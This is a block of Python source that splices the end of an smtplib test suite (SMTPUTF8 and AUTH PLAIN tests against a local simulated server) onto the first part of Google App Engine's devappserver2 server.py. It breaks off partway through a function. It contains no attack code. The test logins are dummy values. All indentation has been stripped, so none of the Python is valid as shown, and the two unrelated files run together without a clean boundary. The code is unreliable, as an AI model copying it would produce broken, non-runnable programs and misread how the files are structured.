smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
with self.assertRaises(smtplib.SMTPNotSupportedError):
smtp.send_message(msg)
def test_name_field_not_included_in_envelop_addresses(self):
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost', timeout=3
)
self.addCleanup(smtp.close)
message = EmailMessage()
message['From'] = email.utils.formataddr(('Michaël', 'michael@example.com'))
message['To'] = email.utils.formataddr(('René', 'rene@example.com'))
self.assertDictEqual(smtp.send_message(message), {})
self.assertEqual(self.serv._addresses['from'], 'michael@example.com')
self.assertEqual(self.serv._addresses['tos'], ['rene@example.com'])
class SimSMTPUTF8Server(SimSMTPServer):
def __init__(self, *args, **kw):
# The base SMTP server turns these on automatically, but our test
# server is set up to munge the EHLO response, so we need to provide
# them as well. And yes, the call is to SMTPServer not SimSMTPServer.
self._extra_features = ['SMTPUTF8', '8BITMIME']
smtpd.SMTPServer.__init__(self, *args, **kw)
def handle_accepted(self, conn, addr):
self._SMTPchannel = self.channel_class(
self._extra_features, self, conn, addr,
decode_data=self._decode_data,
enable_SMTPUTF8=self.enable_SMTPUTF8,
)
def process_message(self, peer, mailfrom, rcpttos, data, mail_options=None,
rcpt_options=None):
self.last_peer = peer
self.last_mailfrom = mailfrom
self.last_rcpttos = rcpttos
self.last_message = data
self.last_mail_options = mail_options
self.last_rcpt_options = rcpt_options
class SMTPUTF8SimTests(unittest.TestCase):
maxDiff = None
def setUp(self):
self.thread_key = threading_setup()
self.real_getfqdn = socket.getfqdn
socket.getfqdn = mock_socket.getfqdn
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
# Pick a random unused port by passing 0 for the port number
self.serv = SimSMTPUTF8Server((HOST, 0), ('nowhere', -1),
decode_data=False,
enable_SMTPUTF8=True)
# Keep a note of what port was assigned
self.port = self.serv.socket.getsockname()[1]
serv_args = (self.serv, self.serv_evt, self.client_evt)
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
# wait until server thread has assigned a port number
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
socket.getfqdn = self.real_getfqdn
# indicate that the client is finished
self.client_evt.set()
# wait for the server thread to terminate
self.serv_evt.wait()
join_thread(self.thread)
del self.thread
self.doCleanups()
threading_cleanup(*self.thread_key)
def test_test_server_supports_extensions(self):
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
smtp.ehlo()
self.assertTrue(smtp.does_esmtp)
self.assertTrue(smtp.has_extn('smtputf8'))
def test_send_unicode_with_SMTPUTF8_via_sendmail(self):
m = '¡a test message containing unicode!'.encode('utf-8')
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
smtp.sendmail('Jőhn', 'Sálly', m,
mail_options=['BODY=8BITMIME', 'SMTPUTF8'])
self.assertEqual(self.serv.last_mailfrom, 'Jőhn')
self.assertEqual(self.serv.last_rcpttos, ['Sálly'])
self.assertEqual(self.serv.last_message, m)
self.assertIn('BODY=8BITMIME', self.serv.last_mail_options)
self.assertIn('SMTPUTF8', self.serv.last_mail_options)
self.assertEqual(self.serv.last_rcpt_options, [])
def test_send_unicode_with_SMTPUTF8_via_low_level_API(self):
m = '¡a test message containing unicode!'.encode('utf-8')
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
smtp.ehlo()
self.assertEqual(
smtp.mail('Jő', options=['BODY=8BITMIME', 'SMTPUTF8']),
(250, b'OK'))
self.assertEqual(smtp.rcpt('János'), (250, b'OK'))
self.assertEqual(smtp.data(m), (250, b'OK'))
self.assertEqual(self.serv.last_mailfrom, 'Jő')
self.assertEqual(self.serv.last_rcpttos, ['János'])
self.assertEqual(self.serv.last_message, m)
self.assertIn('BODY=8BITMIME', self.serv.last_mail_options)
self.assertIn('SMTPUTF8', self.serv.last_mail_options)
self.assertEqual(self.serv.last_rcpt_options, [])
def test_send_message_uses_smtputf8_if_addrs_non_ascii(self):
msg = EmailMessage()
msg['From'] = "Páolo <főo@bar.com>"
msg['To'] = 'Dinsdale'
msg['Subject'] = 'Nudge nudge, wink, wink \u1F609'
# XXX I don't know why I need two \n's here, but this is an existing
# bug (if it is one) and not a problem with the new functionality.
msg.set_content("oh là là, know what I mean, know what I mean?\n\n")
# XXX smtpd converts received /r/n to /n, so we can't easily test that
# we are successfully sending /r/n :(.
expected = textwrap.dedent("""\
From: Páolo <főo@bar.com>
To: Dinsdale
Subject: Nudge nudge, wink, wink \u1F609
Content-Type: text/plain; charset="utf-8"
Content-Transfer-Encoding: 8bit
MIME-Version: 1.0
oh là là, know what I mean, know what I mean?
""")
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
self.assertEqual(smtp.send_message(msg), {})
self.assertEqual(self.serv.last_mailfrom, 'főo@bar.com')
self.assertEqual(self.serv.last_rcpttos, ['Dinsdale'])
self.assertEqual(self.serv.last_message.decode(), expected)
self.assertIn('BODY=8BITMIME', self.serv.last_mail_options)
self.assertIn('SMTPUTF8', self.serv.last_mail_options)
self.assertEqual(self.serv.last_rcpt_options, [])
EXPECTED_RESPONSE = encode_base64(b'\0psu\0doesnotexist', eol='')
class SimSMTPAUTHInitialResponseChannel(SimSMTPChannel):
def smtp_AUTH(self, arg):
# RFC 4954's AUTH command allows for an optional initial-response.
# Not all AUTH methods support this; some require a challenge. AUTH
# PLAIN does those, so test that here. See issue #15014.
args = arg.split()
if args[0].lower() == 'plain':
if len(args) == 2:
# AUTH PLAIN <initial-response> with the response base 64
# encoded. Hard code the expected response for the test.
if args[1] == EXPECTED_RESPONSE:
self.push('235 Ok')
return
self.push('571 Bad authentication')
class SimSMTPAUTHInitialResponseServer(SimSMTPServer):
channel_class = SimSMTPAUTHInitialResponseChannel
class SMTPAUTHInitialResponseSimTests(unittest.TestCase):
def setUp(self):
self.thread_key = threading_setup()
self.real_getfqdn = socket.getfqdn
socket.getfqdn = mock_socket.getfqdn
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
# Pick a random unused port by passing 0 for the port number
self.serv = SimSMTPAUTHInitialResponseServer(
(HOST, 0), ('nowhere', -1), decode_data=True)
# Keep a note of what port was assigned
self.port = self.serv.socket.getsockname()[1]
serv_args = (self.serv, self.serv_evt, self.client_evt)
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
# wait until server thread has assigned a port number
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
socket.getfqdn = self.real_getfqdn
# indicate that the client is finished
self.client_evt.set()
# wait for the server thread to terminate
self.serv_evt.wait()
join_thread(self.thread)
del self.thread
self.doCleanups()
threading_cleanup(*self.thread_key)
def testAUTH_PLAIN_initial_response_login(self):
self.serv.add_feature('AUTH PLAIN')
smtp = smtplib.SMTP(HOST, self.port,
local_hostname='localhost', timeout=15)
smtp.login('psu', 'doesnotexist')
smtp.close()
def testAUTH_PLAIN_initial_response_auth(self):
self.serv.add_feature('AUTH PLAIN')
smtp = smtplib.SMTP(HOST, self.port,
local_hostname='localhost', timeout=15)
smtp.user = 'psu'
smtp.password = 'doesnotexist'
code, response = smtp.auth('plain', smtp.auth_plain)
smtp.close()
self.assertEqual(code, 235)
if __name__ == '__main__':
unittest.main()
|
server.py | #!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Manage the lifecycle of runtime processes and dispatch requests to them."""
import collections
import cStringIO
import functools
import httplib
import logging
import math
import os
import os.path
import random
import re
import string
import threading
import time
import urllib
import urlparse
import wsgiref.headers
from google.appengine.api import api_base_pb
from google.appengine.api import apiproxy_stub_map
from google.appengine.api import appinfo
from google.appengine.api import request_info
from google.appengine.api.logservice import log_service_pb
from google.appengine.tools.devappserver2 import application_configuration
from google.appengine.tools.devappserver2 import blob_image
from google.appengine.tools.devappserver2 import blob_upload
from google.appengine.tools.devappserver2 import channel
from google.appengine.tools.devappserver2 import constants
from google.appengine.tools.devappserver2 import endpoints
from google.appengine.tools.devappserver2 import errors
from google.appengine.tools.devappserver2 import file_watcher
from google.appengine.tools.devappserver2 import go_runtime
from google.appengine.tools.devappserver2 import http_runtime_constants
from google.appengine.tools.devappserver2 import instance
from google.appengine.tools.devappserver2 import login
from google.appengine.tools.devappserver2 import php_runtime
from google.appengine.tools.devappserver2 import python_runtime
from google.appengine.tools.devappserver2 import request_rewriter
from google.appengine.tools.devappserver2 import runtime_config_pb2
from google.appengine.tools.devappserver2 import start_response_utils
from google.appengine.tools.devappserver2 import static_files_handler
from google.appengine.tools.devappserver2 import thread_executor
from google.appengine.tools.devappserver2 import url_handler
from google.appengine.tools.devappserver2 import util
from google.appengine.tools.devappserver2 import wsgi_handler
from google.appengine.tools.devappserver2 import wsgi_server
_LOWER_HEX_DIGITS = string.hexdigits.lower()
_UPPER_HEX_DIGITS = string.hexdigits.upper()
_REQUEST_ID_HASH_LENGTH = 8
_THREAD_POOL = thread_executor.ThreadExecutor()
_RESTART_INSTANCES_CONFIG_CHANGES = frozenset(
[application_configuration.NORMALIZED_LIBRARIES_CHANGED,
application_configuration.SKIP_FILES_CHANGED,
application_configuration.NOBUILD_FILES_CHANGED,
# The server must be restarted when the handlers change because files
# appearing in static content handlers make them unavailable to the
# runtime.
application_configuration.HANDLERS_CHANGED,
application_configuration.ENV_VARIABLES_CHANGED])
_REQUEST_LOGGING_BLACKLIST_RE = re.compile(
r'^/_ah/(?:channel/(?:dev|jsapi)|img|login|upload)')
# Fake arguments for _handle_script_request for request types that don't use
# user-specified handlers.
_EMPTY_MATCH = re.match('', '')
_DUMMY_URLMAP = appinfo.URLMap(script='/')
_SHUTDOWN_TIMEOUT = 30
def _static_files_regex_from_handlers(handlers):
patterns = []
for url_map in handlers:
handler_type = url_map.GetHandlerType()
if url_map.application_readable:
continue
if handler_type == appinfo.STATIC_FILES:
patterns.append(r'(%s)' % url_map.upload)
elif handler_type == appinfo.STATIC_DIR:
patterns.append('(%s%s%s)' % (url_map.static_dir.rstrip(os.path.sep),
re.escape(os.path.sep), r'.*'))
return r'^%s$' % '|'.join(patterns)
class InteractiveCommandError(errors.Error):
pass
class _ScriptHandler(url_handler.UserConfiguredURLHandler):
"""A URL handler that will cause the request to be dispatched to an instance.
This handler is special in that it does not have a working handle() method
since the Server's dispatch logic is used to select the appropriate Instance.
"""
def __init__(self, url_map):
"""Initializer for _ScriptHandler.
Args:
url_map: An appinfo.URLMap instance containing the configuration for this
handler.
"""
try:
url_pattern = re.compile('%s$' % url_map.url)
except re.error, e:
raise errors.InvalidAppConfigError(
'invalid url %r in script handler: %s' % (url_map.url, e))
super(_ScriptHandler, self).__init__(url_map, url_pattern)
self.url_map = url_map
def handle(self, match, environ, start_response):
"""This is a dummy method that should never be called."""
raise NotImplementedError()
class Server(object):
"""The abstract base for all instance pool implementations."""
def _create_instance_factory(self,
server_configuration):
"""Create an instance.InstanceFactory.
Args:
server_configuration: An application_configuration.ServerConfiguration
instance storing the configuration data for a server.
Returns:
A instance.InstanceFactory subclass that can be used to create instances
with the provided configuration.
"""
if server_configuration.runtime == 'go':
return go_runtime.GoRuntimeInstanceFactory(
request_data=self._request_data,
runtime_config_getter=self._get_runtime_config,
server_configuration=server_configuration)
elif server_configuration.runtime in ('python', 'python27'):
return python_runtime.PythonRuntimeInstanceFactory(
request_data=self._request_data,
runtime_config_getter=self._get_runtime_config,
server_configuration=server_configuration)
elif server_configuration.runtime == 'php':
return php_runtime.PHPRuntimeInstanceFactory(
request_data=self._request_data,
runtime_config_getter=self._get_runtime_config,
server_configuration=server_configuration)
else:
assert 0, 'unknown runtime %r' % server_configuration.runtime
def _create_url_handlers(self):
"""Constructs URLHandlers based on the server configuration.
Returns:
A list of url_handler.URLHandlers corresponding that can react as
described in the given configuration.
"""
handlers = []
# Add special URL handlers (taking precedence over user-defined handlers)
url_pattern = '/%s$' % login.LOGIN_URL_RELATIVE
handlers.append(wsgi_handler.WSGIHandler(login.application,
url_pattern))
url_pattern = '/%s' % blob_upload.UPLOAD_URL_PATH
# The blobstore upload handler forwards successful requests back to self
handlers.append(
wsgi_handler.WSGIHandler(blob_upload.Application(self), url_pattern))
url_pattern = '/%s' % blob_image.BLOBIMAGE_URL_PATTERN
handlers.append(
wsgi_handler.WSGIHandler(blob_image.Application(), url_pattern))
url_pattern = '/%s' % channel.CHANNEL_URL_PATTERN
handlers.append(
wsgi_handler.WSGIHandler(channel.application, url_pattern))
url_pattern = '/%s' % endpoints.API_SERVING_PATTERN
handlers.append(
wsgi_handler.WSGIHandler(
endpoints.EndpointsDispatcher(self._dispatcher), url_pattern))
found_start_handler = False
found_warmup_handler = False
# Add user-defined URL handlers
for url_map in self._server_configuration.handlers:
handler_type = url_map.GetHandlerType()
if handler_type == appinfo.HANDLER_SCRIPT:
handlers.append(_ScriptHandler(url_map))
if not found_start_handler and re.match('%s$' % url_map.url,
'/_ah/start'):
found_start_handler = True
if not found_warmup_handler and re.match('%s$' % url_map.url,
'/_ah/warmup'):
found_warmup_handler = True
elif handler_type == appinfo.STATIC_FILES:
handlers.append(
static_files_handler.StaticFilesHandler(
self._server_configuration.application_root,
url_map))
elif handler_type == appinfo.STATIC_DIR:
handlers.append(
static_files_handler.StaticDirHandler(
self._server_configuration.application_root,
url_map))
else:
assert 0, 'unexpected handler %r for %r' % (handler_type, url_map)
# Add a handler for /_ah/start if no script handler matches.
if not found_start_handler:
handlers.insert(0, _ScriptHandler(self._instance_factory.START_URL_MAP))
# Add a handler for /_ah/warmup if no script handler matches and warmup is
# enabled.
if (not found_warmup_handler and
'warmup' in (self._server_configuration.inbound_services or [])):
handlers.insert(0, _ScriptHandler(self._instance_factory.WARMUP_URL_MAP))
return handlers
def _get_runtime_config(self):
"""Returns the configuration for the runtime.
Returns:
A runtime_config_pb2.Config instance representing the configuration to be
passed to an instance. NOTE: This does *not* include the instance_id
field, which must be populated elsewhere.
"""
runtime_config = runtime_config_pb2.Config()
runtime_config.app_id = self._server_configuration.application
runtime_config.version_id = self._server_configuration.version_id
runtime_config.threadsafe = self._server_configuration.threadsafe or False
runtime_config.application_root = (
self._server_configuration.application_root)
if not self._allow_skipped_files:
runtime_config.skip_files = str(self._server_configuration.skip_files)
runtime_config.static_files = _static_files_regex_from_handlers(
self._server_configuration.handlers)
runtime_config.api_port = self._api_port
runtime_config.stderr_log_level = self._runtime_stderr_loglevel
runtime_config.datacenter = 'us1'
runtime_config.auth_domain = self._auth_domain
for library in self._server_configuration.normalized_libraries:
runtime_config.libraries.add(name=library.name, version=library.version)
for key, value in (self._server_configuration.env_variables or {}).items():
runtime_config.environ.add(key=str(key), value=str(value))
if self._cloud_sql_config:
runtime_config.cloud_sql_config.CopyFrom(self._cloud_sql_config)
if self._server_configuration.runtime == 'php':
runtime_config.php_config.php_executable_path = self._php_executable_path
runtime_config.php_config.enable_debugger = (
self._enable_php_remote_debugging)
if (self._python_config and
self._server_configuration.runtime.startswith('python')):
runtime_config.python_config.CopyFrom(self._python_config)
return runtime_config
def _maybe_restart_instances(self, config_changed, file_changed):
"""Restarts instances. May avoid some restarts depending on policy.
One of config_changed or file_changed must be True.
Args:
config_changed: True if the configuration for the application has changed.
file_changed: True if any file relevant to the application has changed.
"""
if not config_changed and not file_changed:
return
logging.debug('Restarting instances.')
policy = self._instance_factory.FILE_CHANGE_INSTANCE_RESTART_POLICY
assert policy is not None, 'FILE_CHANGE_INSTANCE_RESTART_POLICY not set'
with self._condition:
instances_to_quit = set()
for inst in self._instances:
if (config_changed or
(policy == instance.ALWAYS) or
(policy == instance.AFTER_FIRST_REQUEST and inst.total_requests)):
instances_to_quit.add(inst)
self._instances -= instances_to_quit
for inst in instances_to_quit:
inst.quit(allow_async=True)
def _handle_changes(self):
"""Handle file or configuration changes."""
# Always check for config and file changes because checking also clears
# pending changes.
config_changes = self._server_configuration.check_for_updates()
has_file_changes = self._watcher.has_changes()
if application_configuration.HANDLERS_CHANGED in config_changes:
handlers = self._create_url_handlers()
with self._handler_lock:
self._handlers = handlers
if has_file_changes:
self._instance_factory.files_changed()
if config_changes & _RESTART_INSTANCES_CONFIG_CHANGES:
self._instance_factory.configuration_changed(config_changes)
self._maybe_restart_instances(
config_changed=bool(config_changes & _RESTART_INSTANCES_CONFIG_CHANGES),
file_changed=has_file_changes)
def __init__(self,
server_configuration,
host,
balanced_port,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_executable_path,
enable_php_remote_debugging,
python_config,
cloud_sql_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances,
use_mtime_file_watcher,
automatic_restarts,
allow_skipped_files):
"""Initializer for Server.
Args:
server_configuration: An application_configuration.ServerConfiguration
instance storing the configuration data for a server.
host: A string containing the host that any HTTP servers should bind to
e.g. "localhost".
balanced_port: An int specifying the port where the balanced server for
the pool should listen.
api_port: The port that APIServer listens for RPC requests on.
auth_domain: A string containing the auth domain to set in the environment
variables.
runtime_stderr_loglevel: An int reprenting the minimum logging level at
which runtime log messages should be written to stderr. See
devappserver2.py for possible values.
php_executable_path: A string containing the path to PHP execution e.g.
"/usr/bin/php-cgi".
enable_php_remote_debugging: A boolean indicating whether the PHP
interpreter should be started with XDebug remote debugging enabled.
python_config: A runtime_config_pb2.PythonConfig instance containing
Python runtime-specific configuration. If None then defaults are
used.
cloud_sql_config: A runtime_config_pb2.CloudSQL instance containing the
required configuration for local Google Cloud SQL development. If None
then Cloud SQL will not be available.
default_version_port: An int containing the port of the default version.
port_registry: A dispatcher.PortRegistry used to provide the Dispatcher
with a mapping of port to Server and Instance.
request_data: A wsgi_request_info.WSGIRequestInfo that will be provided
with request information for use by API stubs.
dispatcher: A Dispatcher instance that can be used to make HTTP requests.
max_instances: The maximum number of instances to create for this server.
If None then there is no limit on the number of created instances.
use_mtime_file_watcher: A bool containing whether to use mtime polling to
monitor file changes even if other options are available on the
current platform.
automatic_restarts: If True then instances will be restarted when a
file or configuration change that effects them is detected.
allow_skipped_files: If True then all files in the application's directory
are readable, even if they appear in a static handler or "skip_files"
directive.
"""
self._server_configuration = server_configuration
self._name = server_configuration.server_name
self._host = host
self._api_port = api_port
self._auth_domain = auth_domain
self._runtime_stderr_loglevel = runtime_stderr_loglevel
self._balanced_port = balanced_port
self._php_executable_path = php_executable_path
self._enable_php_remote_debugging = enable_php_remote_debugging
self._python_config = python_config
self._cloud_sql_config = cloud_sql_config
self._request_data = request_data
# _create_instance_factory() transitively calls _get_runtime_config, which
# uses self._allow_skipped_files.
self._allow_skipped_files = allow_skipped_files
self._instance_factory = self._create_instance_factory(
self._server_configuration)
self._dispatcher = dispatcher
self._max_instances = max_instances
self._automatic_restarts = automatic_restarts
self._use_mtime_file_watcher = use_mtime_file_watcher
if self._automatic_restarts:
self._watcher = file_watcher.get_file_watcher(
[self._server_configuration.application_root] +
self._instance_factory.get_restart_directories(),
self._use_mtime_file_watcher)
else:
self._watcher = None
self._handler_lock = threading.Lock()
self._handlers = self._create_url_handlers()
self._default_version_port = default_version_port
self._port_registry = port_registry
self._balanced_server = wsgi_server.WsgiServer(
(self._host, self._balanced_port), self)
self._quit_event = threading.Event() # Set when quit() has been called.
@property
def name(self):
"""The name of the server, as defined in app.yaml.
This value will be constant for the lifetime of the server even in the
server configuration changes.
"""
return self._name
@property
def ready(self):
"""The server is ready to handle HTTP requests."""
return self._balanced_server.ready
@property
def balanced_port(self):
"""The port that the balanced HTTP server for the Server is listening on."""
assert self._balanced_server.ready, 'balanced server not running'
return self._balanced_server.port
@property
def host(self):
"""The host that the HTTP server(s) for this Server is listening on."""
return self._host
@property
def balanced_address(self):
"""The address of the balanced HTTP server e.g. "localhost:8080"."""
if self.balanced_port != 80:
return '%s:%s' % (self.host, self.balanced_port)
else:
return self.host
@property
def max_instance_concurrent_requests(self):
"""The number of concurrent requests that each Instance can handle."""
return self._instance_factory.max_concurrent_requests
@property
def server_configuration(self):
"""The application_configuration.ServerConfiguration for this server."""
return self._server_configuration
@property
def supports_interactive_commands(self):
"""True if the server can evaluate arbitrary code and return the result."""
return self._instance_factory.SUPPORTS_INTERACTIVE_REQUESTS
def _handle_script_request(self,
environ,
start_response,
url_map,
match,
inst=None):
"""Handles a HTTP request that has matched a script handler.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
inst: The Instance to send the request to. If None then an appropriate
Instance will be chosen.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
raise NotImplementedError()
def _no_handler_for_request(self, environ, start_response, request_id):
"""Handle a HTTP request that does not match any user-defined handlers."""
self._insert_log_message('No handlers matched this URL.', 2, request_id)
start_response('404 Not Found', [('Content-Type', 'text/plain')])
return ['The url "%s" does not match any handlers.' % environ['PATH_INFO']]
def _error_response(self, environ, start_response, status):
start_response('%d %s' % (status, httplib.responses[status]), [])
return []
def _handle_request(self, environ, start_response, inst=None,
request_type=instance.NORMAL_REQUEST):
"""Handles a HTTP request.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
inst: The Instance to send the request to. If None then an appropriate
Instance will be chosen. Setting inst is not meaningful if the
request does not match a "script" handler.
request_type: The type of the request. See instance.*_REQUEST module
constants.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
environ['SERVER_PORT'] = os.environ['NGINX_PORT']
if 'HTTP_HOST' in environ:
environ['SERVER_NAME'] = environ['HTTP_HOST'].split(':', 1)[0]
environ['DEFAULT_VERSION_HOSTNAME'] = '%s:%s' % (
environ['SERVER_NAME'], os.environ['NGINX_PORT'])
with self._request_data.request(
environ,
self._server_configuration) as request_id:
should_log_request = not _REQUEST_LOGGING_BLACKLIST_RE.match(
environ['PATH_INFO'])
environ['REQUEST_ID_HASH'] = self.generate_request_id_hash()
if should_log_request:
environ['REQUEST_LOG_ID'] = self.generate_request_log_id()
if 'HTTP_HOST' in environ:
hostname = environ['HTTP_HOST']
elif environ['SERVER_PORT'] == '80':
hostname = environ['SERVER_NAME']
else:
hostname = '%s:%s' % (environ['SERVER_NAME'], environ['SERVER_PORT'])
if environ.get('QUERY_STRING'):
resource = '%s?%s' % (urllib.quote(environ['PATH_INFO']),
environ['QUERY_STRING'])
else:
resource = urllib.quote(environ['PATH_INFO'])
email, _, _ = login.get_user_info(environ.get('HTTP_COOKIE', ''))
method = environ.get('REQUEST_METHOD', 'GET')
http_version = environ.get('SERVER_PROTOCOL', 'HTTP/1.0')
logservice = apiproxy_stub_map.apiproxy.GetStub('logservice')
logservice.start_request(
request_id=request_id,
user_request_id=environ['REQUEST_LOG_ID'],
ip=environ.get('REMOTE_ADDR', ''),
app_id=self._server_configuration.application,
version_id=self._server_configuration.version_id,
nickname=email.split('@', 1)[0],
user_agent=environ.get('HTTP_USER_AGENT', ''),
host=hostname,
method=method,
resource=resource,
http_version=http_version)
def wrapped_start_response(status, response_headers, exc_info=None):
response_headers.append(('Server',
http_runtime_constants.SERVER_SOFTWARE))
if should_log_request:
headers = wsgiref.headers.Headers(response_headers)
status_code = int(status.split(' ', 1)[0])
content_length = int(headers.get('Content-Length', 0))
logservice.end_request(request_id, status_code, content_length)
logging.info('%(server_name)s: '
'"%(method)s %(resource)s %(http_version)s" '
'%(status)d %(content_length)s',
{'server_name': self.name,
'method': method,
'resource': resource,
'http_version': http_version,
'status': status_code,
'content_length': content_length or '-'})
return start_response(status, response_headers, exc_info)
if (environ['REQUEST_METHOD'] in ('GET', 'HEAD', 'TRACE') and
int(environ.get('CONTENT_LENGTH') or '0') != 0):
# CONTENT_LENGTH may be empty or absent.
wrapped_start_response('400 Bad Request', [])
return ['"%s" requests may not contain bodies.' %
environ['REQUEST_METHOD']]
with self._handler_lock:
handlers = self._handlers
try:
request_url = environ['PATH_INFO']
if request_type in (instance.BACKGROUND_REQUEST,
instance.INTERACTIVE_REQUEST,
instance.SHUTDOWN_REQUEST):
app = functools.partial(self._handle_script_request,
url_map=_DUMMY_URLMAP,
match=_EMPTY_MATCH,
request_id=request_id,
inst=inst,
request_type=request_type)
return request_rewriter.frontend_rewriter_middleware(app)(
environ, wrapped_start_response)
for handler in handlers:
match = handler.match(request_url)
if match:
auth_failure = handler.handle_authorization(environ,
wrapped_start_response)
if auth_failure is not None:
return auth_failure
if isinstance(handler, _ScriptHandler):
app = functools.partial(self._handle_script_request,
url_map=handler.url_map,
match=match,
request_id=request_id,
inst=inst,
request_type=request_type)
return request_rewriter.frontend_rewriter_middleware(app)(
environ, wrapped_start_response)
else:
return handler.handle(match, environ, wrapped_start_response)
return self._no_handler_for_request(environ, wrapped_start_response,
request_id)
except StandardError, e:
logging.exception('Request to %r failed', request_url)
wrapped_start_response('500 Internal Server Error', [], e)
return []
def _async_shutdown_instance(self, inst, port):
_THREAD_POOL.submit(self._shutdown_instance, inst, port)
def _shutdown_instance(self, inst, port):
force_shutdown_time = time.time() + _SHUTDOWN_TIMEOUT
try:
environ = self.build_request_environ(
'GET', '/_ah/stop', [], '', '0.1.0.3', port, fake_login=True)
self._handle_request(environ,
start_response_utils.null_start_response,
inst=inst,
request_type=instance.SHUTDOWN_REQUEST)
logging.debug('Sent shutdown request: %s', inst)
except:
logging.exception('Internal error while handling shutdown request.')
finally:
time_to_wait = force_shutdown_time - time.time()
self._quit_event.wait(time_to_wait)
inst.quit(force=True)
def _insert_log_message(self, message, level, request_id):
logs_group = log_service_pb.UserAppLogGroup()
log_line = logs_group.add_log_line()
log_line.set_timestamp_usec(int(time.time() * 1e6))
log_line.set_level(level)
log_line.set_message(message)
request = log_service_pb.FlushRequest()
request.set_logs(logs_group.Encode())
response = api_base_pb.VoidProto()
logservice = apiproxy_stub_map.apiproxy.GetStub('logservice')
logservice._Dynamic_Flush(request, response, request_id)
@staticmethod
def generate_request_log_id():
"""Generate a random REQUEST_LOG_ID.
Returns:
A string suitable for use as a REQUEST_LOG_ID. The returned string is
variable length to emulate the the production values, which encapsulate
the application id, version and some log state.
"""
return ''.join(random.choice(_LOWER_HEX_DIGITS)
for _ in range(random.randrange(30, 100)))
@staticmethod
def generate_request_id_hash():
"""Generate a random REQUEST_ID_HASH."""
return ''.join(random.choice(_UPPER_HEX_DIGITS)
for _ in range(_REQUEST_ID_HASH_LENGTH))
def set_num_instances(self, instances):
"""Sets the number of instances for this server to run.
Args:
instances: An int containing the number of instances to run.
"""
raise request_info.NotSupportedWithAutoScalingError()
def get_num_instances(self):
"""Returns the number of instances for this server to run."""
raise request_info.NotSupportedWithAutoScalingError()
def suspend(self):
"""Stops the server from serving requests."""
raise request_info.NotSupportedWithAutoScalingError()
def resume(self):
"""Restarts the server."""
raise request_info.NotSupportedWithAutoScalingError()
def get_instance_address(self, instance_id):
"""Returns the address of the HTTP server for an instance."""
return '%s:%s' % (self.host, self.get_instance_port(instance_id))
def get_instance_port(self, instance_id):
"""Returns the port of the HTTP server for an instance."""
raise request_info.NotSupportedWithAutoScalingError()
def get_instance(self, instance_id):
"""Returns the instance with the provided instance ID."""
raise request_info.NotSupportedWithAutoScalingError()
@property
def supports_individually_addressable_instances(self):
return False
def create_interactive_command_server(self):
"""Returns a InteractiveCommandServer that can be sent user commands."""
if self._instance_factory.SUPPORTS_INTERACTIVE_REQUESTS:
return InteractiveCommandServer(self._server_configuration,
self._host,
self._balanced_port,
self._api_port,
self._auth_domain,
self._runtime_stderr_loglevel,
self._php_executable_path,
self._enable_php_remote_debugging,
self._python_config,
self._cloud_sql_config,
self._default_version_port,
self._port_registry,
self._request_data,
self._dispatcher,
self._use_mtime_file_watcher,
self._allow_skipped_files)
else:
raise NotImplementedError('runtime does not support interactive commands')
def build_request_environ(self, method, relative_url, headers, body,
source_ip, port, fake_login=False):
if isinstance(body, unicode):
body = body.encode('ascii')
url = urlparse.urlsplit(relative_url)
if port != 80:
host = '%s:%s' % (self.host, port)
else:
host = self.host
environ = {constants.FAKE_IS_ADMIN_HEADER: '1',
'CONTENT_LENGTH': str(len(body)),
'PATH_INFO': url.path,
'QUERY_STRING': url.query,
'REQUEST_METHOD': method,
'REMOTE_ADDR': source_ip,
'SERVER_NAME': self.host,
'SERVER_PORT': str(port),
'SERVER_PROTOCOL': 'HTTP/1.1',
'wsgi.version': (1, 0),
'wsgi.url_scheme': 'http',
'wsgi.errors': cStringIO.StringIO(),
'wsgi.multithread': True,
'wsgi.multiprocess': True,
'wsgi.input': cStringIO.StringIO(body)}
if fake_login:
environ[constants.FAKE_LOGGED_IN_HEADER] = '1'
util.put_headers_in_environ(headers, environ)
environ['HTTP_HOST'] = host
return environ
class AutoScalingServer(Server):
"""A pool of instances that is autoscaled based on traffic."""
# The minimum number of seconds to wait, after quitting an idle instance,
# before quitting another idle instance.
_MIN_SECONDS_BETWEEN_QUITS = 60
# The time horizon to use when calculating the number of instances required
# to serve the current level of traffic.
_REQUIRED_INSTANCE_WINDOW_SECONDS = 60
_DEFAULT_AUTOMATIC_SCALING = appinfo.AutomaticScaling(
min_pending_latency='0.1s',
max_pending_latency='0.5s',
min_idle_instances=1,
max_idle_instances=1000)
@staticmethod
def _parse_pending_latency(timing):
"""Parse a pending latency string into a float of the value in seconds.
Args:
timing: A str of the form 1.0s or 1000ms.
Returns:
A float representation of the value in seconds.
"""
if timing.endswith('ms'):
